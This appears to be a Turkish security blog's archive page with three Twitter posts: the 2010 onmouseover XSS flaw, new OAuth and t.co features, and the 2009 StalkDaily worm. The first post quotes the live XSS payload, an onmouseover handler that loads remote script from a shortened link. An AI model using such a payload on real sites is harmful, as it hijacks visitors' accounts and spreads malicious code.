Browse > Home /

| Subcribe RSS

Twitter’ın mouseover java script açığı, tüm kullanıcıları etkiledi

September 21st, 2010 | No Comments | Posted in Exploit, Vulnerability

Bugün gerçekleşen bir güvenlik açığı, tüm twitter kullanıcılarını etkisi altına aldı. Twitter hesaplarını web üzerinden kullanan kullanıcıları etkisi altına alan bu kod açıklığı, listenizdeki kullanıcıların tweet’lerine yansıyan arka planı ve yazıtipi siyah bir şekilde karşımıza çıktı. Siz fare imlecinizi bu tweet’in üzerine getirir getirmez, otomatik olarak RT yani Re-tweet yapmanızı sağlayan ilgili açıklık, yine web tarayıcınıza twitter’dan kaynaklı olarak değişik hata mesajı içerikleriyle karşılandı. İçeriği aşağıdaki şekilde olan açıklığın, ekran görüntüsüne de aşağıdan ulaşabilirsiniz:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

Twitter Fail

http://yfrog.com/mqdirdp

Sorunun şimdilik giderilmesi için mobile.tweeter.com sitesi önerilirken, tweetdeck gibi 3rd yazılımların da, sorundan etkilenmediğini belirtmem gerekiyor. Resmi bir açıklama yapmayan twitter, benzer durumlarda kullandığı twitter hesabından kullandığı status raporlarından konunun XSS attack ‘a bağlı olarak açıklıktan faydalanıldığını ve kısa sürede giderileceğini haber vermiş.

Tags: , , , , , , , ,

twitter’ın sunduğu yeni özellikler

September 20th, 2010 | No Comments | Posted in Mobile

Micro-blogging kavramı blog yazmayı arka planda bıraksa da, blog’lara eklenen bu ara uygulamalar ile twitter gibi anlık iletilerinizi girebileceğiniz bu platformlarınıza doping yapmanız mümkün.

İnternet’in tartışmasız en popüler sosyal paylaşım /micro-blogging sitesi olan twitter, yakın bir süre içinde yeni arayüzüne kavuşacak. Bu konuda yaptıkları birkaç yenilik, bu sistemin yeni arayüzüne hazırlık olarak düşünülmüş olduğunun bir göstergesi diyebiliriz.

Geliştirilen pek çok uygulama, kendi platformlarını oluşturmak yerine twitter API’sini kullanarak direkt olarak twitter ile entegre çalışabiliyor. Dünya’da Twitter API’sini kullanan 250.000’in üzerinde uygulama olmasının yanında, bunların en popülerleri arasında masaüstü ve mobil olarak kullanabilen tweetdeck, web-sitesi olarak TweetMeme, tweeter’a özel iPhone ve Blackberry uygulamalarının yanında ayrıca çevrimiçi lokasyon bazlı Foursquare bulunuyor.

Yukarıda saydığım yeni twitter özelliklerinden ilki, bu uygulamaların twitter’a erişmesi için sağlanan “OAuth” erişimi. 31 Ağustos’tan itibaren kullanılmaya başlanan bu özellik ile;

  • Şifrenizi istemeden tamamen sizin onayınıza bağlı olarak uygulamaların twitter’ınıza erişim sağlanması
  • Masaüstü ve mobil uygulamalar şifrenizi istemeye devam edecek ancak OAuth kullanılacağı için sizin zaman diliminiz ya da isteğinize bağlı olarak tweetlenmesi

Peki bu özelliğin kullanıcılara ne gibi faydaları var?

  • OAuth ile uygulamalar şifrelerinizi kendi ortamlarında saklayamayacak
  • Şifrenizi değiştirseniz bile uygulamalar twitter hesabınıza erişmeye devam edebilecek
  • Bazı uygulamalar tekrardan onayınızı isteyebilir ya da tamemen kullanımı kısıtlayabilir. Bu kısıtlama konusunda özellikle iPhone ile kullandığım twitterrific uygulamasını örnek gösterebilirim. Bu nedenle artık tweetdeck kullanıyorum
  • Yetki verdiğiniz tüm uygulamalara, http://twitter.com/settings/connections adresinden bakabilirsiniz

Bir diğer özellik ise daha çok kontrol amaçlı olarak eklenmiş. Yeni eklenen t.co URL wrapping özelliği ile kısaltılmış URL’lerin kontrolü twitter tarafından sağlanarak, ilgili internet adreslerinin herhangi bir malware ya da phishing olma riskini ortadan kaldırarak, daha güvenli bir paylaşım ortamı sunuluyor.

Tüm bu eklenen özelliklere ek olarak, twitter’ın yakın zamanda tüm kullanıcılarına sunacağı yeni arayüz bilgilerine http://twitter.com/newtwitter adresinden erişebilirsiniz. Yeni arayüz ile eskiye oranla daha interaktif bir paylaşım platformu hedeflendiğini gözlemeyebilirsiniz.

Tags: , , , ,

twitter sitesinin yavaşlığı worm saldırılarından mı kaynaklanıyor?

April 14th, 2009 | 1 Comment | Posted in Güvenlik, Phishing

İnternet ortamının olmazsa olmazları arasında yer almayı başaran ve adeta bir sektör olan Sosyal Ağ ortamları dün geçtikçe daha fazla önem kazanıyor. Bunun en büyük örnekleri arasında yer alan twitter.com sitesi, facebook ve myspace gibi sitelerden sonra en çok kullanılan 3. paylaşım sitesi olarak kullanılıyor. Bunu geçtiğimiz seneye oranla yaklaşık olarak %400 kullanıcı artışına bağlayabiliriz. Yanlız büyümeyle beraber çeşitli sıkıntılar da beraberinde geliyor.

twitter’ın büyümesi ile birlikte önce sitenin sertifika sorunu boy göstermiş ve ardından çeşitli phising saldırıları gerçekleşerek, sitenin itibari (Özellikle güvenlik konusunda) bir nevi sarsılmıştı. Şimdiki sorun ise, diğerlerine nispeten daha büyük gözüküyor. Bir worm saldırısı olarak nitelendirilen saldırı neticesinde, kullanıcıların Javascript destekli sayfalarına yerleşen kurtçuk, bu profili her ziyaret eden kullanıcının da profiline bulaşarak ciddi bir oranda yayılmaya başlıyor. Cumartesi günü başlayan sorun, twitter servislerindeki XSS (Cross site scripting) açığı sayesinde gerçekleşmiş [Konu ile ilgili IE8’nin XSS güvenlik tedbirleri slaytlarına bakabilirsiniz]. Kullanıcılar ilgili post’lara reply yapınca, worm otomatik olarak StalkDaily.com adlı bir sitenin reklamını yapıyor. twitter yetkilileri 36 saat sonra 3 yeni worm açığı tespit etmiş ve yaklaşık olarak 10.000 post bu sorundan etkilenmiş.

Şimdilik ilgili sorunu kapatan yetkililerin, ana XSS sorununu kapatamadıkları söyleniyor. Böylece ilgili worm, yeni şekillerde karşılarına çıkabilir ve ilgili açıklıklardan faydalanarak daha fazla kullanıcıyı etkileyerek, ciddi zararlar verebilir. Geçtiğimiz günlerde bende çeşitli login sorunları yaşamış ve bir müddet siteye erişememiştim. twitter, meşhur balinasını kaldırmak için daha çok kuş sürüsüne sahip olması gerekiyor 8)

Tags: , , , , ,
  • Site istatistik

    Bugünkü ziyaret: 16
  • Add to Technorati Favorites

    Mail adresinizi girin:



  • Google Connnect
  • RSS DarkHardWare News